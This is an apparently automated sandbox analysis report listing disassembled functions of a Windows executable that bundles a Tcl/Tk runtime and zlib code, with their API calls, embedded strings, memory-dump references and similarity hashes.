Function 00007FF6399B76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6399B774A

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 5fee6f4b153d664a2bd563205a638a7a0632882397ffaff6518509efc46c8e1f
Instruction ID: 112920b6347dd9481128a4aadfd3008750ea527117ab69629fe34ce041bf3be9
Opcode Fuzzy Hash: 5fee6f4b153d664a2bd563205a638a7a0632882397ffaff6518509efc46c8e1f
Instruction Fuzzy Hash: 3E21A622B0865646FA10AE1AAD443BAA6A6FF45BD4F8C4530DD4D87BCBDE7DE041DB00

Function 00007FF6399CAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CACD2

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
Instruction ID: 075d174c29e8b9a285cc86435d9de6b6566309175037b2baedb39b092c8697f9
Opcode Fuzzy Hash: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
Instruction Fuzzy Hash: 5F31B021E1864286F711AF559C413BD2796AF90BA6F490135EA1E833DBCFBDE441AF20

Function 00007FF6399C52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C5209

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: 56b9e94d63be7f45dbb1bba05753af811a8de41adb3b99ca54eef3c21e62fd0c
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: 0F114F21E1D68182EA619F519C0027EA3A6AF95B80F4C4531EA4D97BDFCF3CE840AF51

Function 00007FF6399D5664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D5687

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: a08a8f01a3e38d73171e4013f390a53a909629312db10b44d83c032028ec7086
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: 06216572A18A8186DB618F18D48077976A2EF94B94F684234E65DC77EEDF3DD800DF01

Function 00007FF6399BF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399BF730

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: cb41d71a703044fa55ed11e87dc92ecfc2a6ef28e0a2cd7a8ce8a7d49e575bbe
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction Fuzzy Hash: 3C01A522B0874241EA04AF965940069A7AAEF95FE0F4C4671DE5C93BDFDE3CD5029B00

Function 00007FF6399CC90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6399BFFB0,?,?,?,00007FF6399C161A,?,?,?,?,?,00007FF6399C2E09), ref: 00007FF6399CC94A

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: 07109acda032d58db3665b32a49a7b6757112b3a2e0f4f536edd6dae4471efae
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: 99F0F811F1928785FF54AFA15D5127956825F8ABA2F0C4B30E92EC63CBEE2CA541AD20

Non-executed Functions

Function 00007FF6399B6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6399B6EB7
GetProcAddress.KERNEL32 ref: 00007FF6399B6EFD
GetProcAddress.KERNEL32 ref: 00007FF6399B6F22
GetProcAddress.KERNEL32 ref: 00007FF6399B6F47
GetProcAddress.KERNEL32 ref: 00007FF6399B6F6F
GetProcAddress.KERNEL32 ref: 00007FF6399B6F97
GetProcAddress.KERNEL32 ref: 00007FF6399B6FBF
GetProcAddress.KERNEL32 ref: 00007FF6399B6FE7
GetProcAddress.KERNEL32 ref: 00007FF6399B700F

Strings

Tcl_GetObjResult, xrefs: 00007FF6399B72AD, 00007FF6399B72C9
Tcl_Finalize, xrefs: 00007FF6399B6F65, 00007FF6399B6F81
Tcl_DoOneEvent, xrefs: 00007FF6399B6F3D, 00007FF6399B6F59
Tcl_NewByteArrayObj, xrefs: 00007FF6399B725D, 00007FF6399B7279
Tcl_SetVar2, xrefs: 00007FF6399B71BD, 00007FF6399B71D9
Tcl_CreateThread, xrefs: 00007FF6399B6FDD, 00007FF6399B6FF9
Tcl_FinalizeThread, xrefs: 00007FF6399B6F8D, 00007FF6399B6FA9
Tcl_CreateInterp, xrefs: 00007FF6399B6EF3, 00007FF6399B6F0F
Tcl_ThreadAlert, xrefs: 00007FF6399B716D, 00007FF6399B7189
Tcl_JoinThread, xrefs: 00007FF6399B702D, 00007FF6399B7049
Tcl_FindExecutable, xrefs: 00007FF6399B6F18, 00007FF6399B6F34
Tcl_GetVar2, xrefs: 00007FF6399B7195, 00007FF6399B71B1
Tcl_EvalObjv, xrefs: 00007FF6399B7325, 00007FF6399B7341
Tcl_ConditionNotify, xrefs: 00007FF6399B70F5, 00007FF6399B7111
Tcl_NewStringObj, xrefs: 00007FF6399B7235, 00007FF6399B7251
Tcl_EvalEx, xrefs: 00007FF6399B72FD, 00007FF6399B7319
Tcl_GetString, xrefs: 00007FF6399B720D, 00007FF6399B7229
Tcl_ConditionWait, xrefs: 00007FF6399B711D, 00007FF6399B7139
Failed to get address for %hs, xrefs: 00007FF6399B6ED0
Tcl_SetVar2Ex, xrefs: 00007FF6399B7285, 00007FF6399B72A1
Tcl_Init, xrefs: 00007FF6399B6EB0, 00007FF6399B6EC9
GetProcAddress, xrefs: 00007FF6399B6ED7
Tcl_EvalFile, xrefs: 00007FF6399B72D5, 00007FF6399B72F1
Tcl_MutexFinalize, xrefs: 00007FF6399B70A5, 00007FF6399B70C1
Tcl_DeleteInterp, xrefs: 00007FF6399B6FB5, 00007FF6399B6FD1
Tcl_MutexUnlock, xrefs: 00007FF6399B707D, 00007FF6399B7099
Tcl_Free, xrefs: 00007FF6399B7375, 00007FF6399B7391
Tcl_MutexLock, xrefs: 00007FF6399B7055, 00007FF6399B7071
Tcl_GetCurrentThread, xrefs: 00007FF6399B7005, 00007FF6399B7021
Tcl_ThreadQueueEvent, xrefs: 00007FF6399B7145, 00007FF6399B7161
Tk_GetNumMainWindows, xrefs: 00007FF6399B73C5, 00007FF6399B73E1
Tcl_CreateObjCommand, xrefs: 00007FF6399B71E5, 00007FF6399B7201
Tcl_ConditionFinalize, xrefs: 00007FF6399B70CD, 00007FF6399B70E9
Tcl_Alloc, xrefs: 00007FF6399B734D, 00007FF6399B7369
Tk_Init, xrefs: 00007FF6399B739D, 00007FF6399B73B9

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: b0625da47e1d62b4d2f7ed068b07fa581d285f2619d457baafaa486d2f2e8487
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: 0BE1B265959B03D0FA199F15E8801B462B3EF19795F8C1136D80E82BEEEF3CB558AB40

Function 00007FF6399D33BC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6399D340A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D3A76
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D3BEC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D3EAA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D40CA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D4307
memcpy_s.LIBCPMT ref: 00007FF6399D43E2
memcpy_s.LIBCPMT ref: 00007FF6399D448D
memcpy_s.LIBCPMT ref: 00007FF6399D455C

Strings

1#QNAN, xrefs: 00007FF6399D3523
1#SNAN, xrefs: 00007FF6399D351A
1#INF, xrefs: 00007FF6399D3533
1#IND, xrefs: 00007FF6399D34F7

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
Instruction ID: 8b6f2fcf061b27f97f3754bcc7c8a6bbe22ff1de4ae48ef516ad52b8833e4b79
Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
Instruction Fuzzy Hash: 5BB2C372A182828BE7258E64D5817FD77A2FF58389F485135DA0D97BCADF38A900DF40

Function 00007FF6399B79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7A1B
RemoveDirectoryW.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7A9E
DeleteFileW.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7ABD
FindNextFileW.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7ACB
FindClose.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7ADC
RemoveDirectoryW.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7AE5

Strings

%s\*, xrefs: 00007FF6399B79E2

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: 9b3062bb9eced70b9f5a44a8f542fc99120c9f293cc927ccb8e8015a742684cf
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: 3D417321A0C54395EA609F28E8946B96372FF94754F480632D59DC2BDEDF3CE64ADF00

Function 00007FF6399B9FCD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid literal/length code, xrefs: 00007FF6399BA702
invalid literal/lengths set, xrefs: 00007FF6399BA453
too many length or distance symbols, xrefs: 00007FF6399BA166
invalid code -- missing end-of-block, xrefs: 00007FF6399BA3E6
invalid distance code, xrefs: 00007FF6399BA8D4
invalid distance too far back, xrefs: 00007FF6399BA990
invalid distances set, xrefs: 00007FF6399BA4C0
invalid code lengths set, xrefs: 00007FF6399BA14D
invalid bit length repeat, xrefs: 00007FF6399BA3B9

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
Instruction ID: 966edf1186aaacc1f9fd15fe24e70a677bb54df603afc31e86100fb9c12f2c54
Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
Instruction Fuzzy Hash: 3652C172A196A68BE7A48F14C458A7E3AFEFB84344F094139E64A877C5DF3DD844DB00

Function 00007FF6399BC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6399BC468
RtlCaptureContext.KERNEL32 ref: 00007FF6399BC495
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6399BC4AF
RtlVirtualUnwind.KERNEL32 ref: 00007FF6399BC4F0
IsDebuggerPresent.KERNEL32 ref: 00007FF6399BC544
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6399BC561
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6399BC56C

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction ID: 88cc63fa2d3d78d5702b9939fa759bd5f20276f3867e74f08a6b3a9732b2e0c4
Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction Fuzzy Hash: A7314172609B8286EB609F64E8803ED7366FB45744F08403ADB4D87B99EF3CD548DB10

Function 00007FF6399B29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6399B342E,?,00007FF6399B3534), ref: 00007FF6399B2A14
FormatMessageW.KERNEL32(?,?,?,00007FF6399B342E), ref: 00007FF6399B2A7D
MessageBoxW.USER32 ref: 00007FF6399B2ACF

Strings

%ls%ls: %ls, xrefs: 00007FF6399B2A96
Error, xrefs: 00007FF6399B2ABE
<FormatMessageW failed.>, xrefs: 00007FF6399B2A83

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message$ErrorFormatLast
String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
API String ID: 3971115935-1149178304
Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
Instruction ID: e23df13dd8c211dbbfe134ac05227a4795ee38c66b6018f8bd935c15cbdd32e1
Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
Instruction Fuzzy Hash: 20216072608A8682E7209F11F4502EA73A5FB88784F440136EACD93BDDDF7CD6469F40

Function 00007FF6399D4F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6399D4F55

Part of subcall function 00007FF6399D48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D48BC

Part of subcall function 00007FF6399C9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C6E
Part of subcall function 00007FF6399C9C58: GetLastError.KERNEL32(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C78

Part of subcall function 00007FF6399C9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6399C9BEF,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399C9C19
Part of subcall function 00007FF6399C9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6399C9BEF,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399C9C3E

_get_daylight.LIBCMT ref: 00007FF6399D4F44

Part of subcall function 00007FF6399D4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D491C

_get_daylight.LIBCMT ref: 00007FF6399D51BA
_get_daylight.LIBCMT ref: 00007FF6399D51CB
_get_daylight.LIBCMT ref: 00007FF6399D51DC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6399D541C), ref: 00007FF6399D5203

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
Instruction ID: 9a813929e3c5294596a21913cb679a5a8ca6ed35b0adb9036ce81672dce53359
Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
Instruction Fuzzy Hash: 95D1B226E0824286EB24AF25D8811B9A7A6EF44794F484135EA4DC77DFDF3CE841EB41

Function 00007FF6399C9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6399C999D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6399C99B5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6399C99F0
IsDebuggerPresent.KERNEL32 ref: 00007FF6399C9A29
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6399C9A33
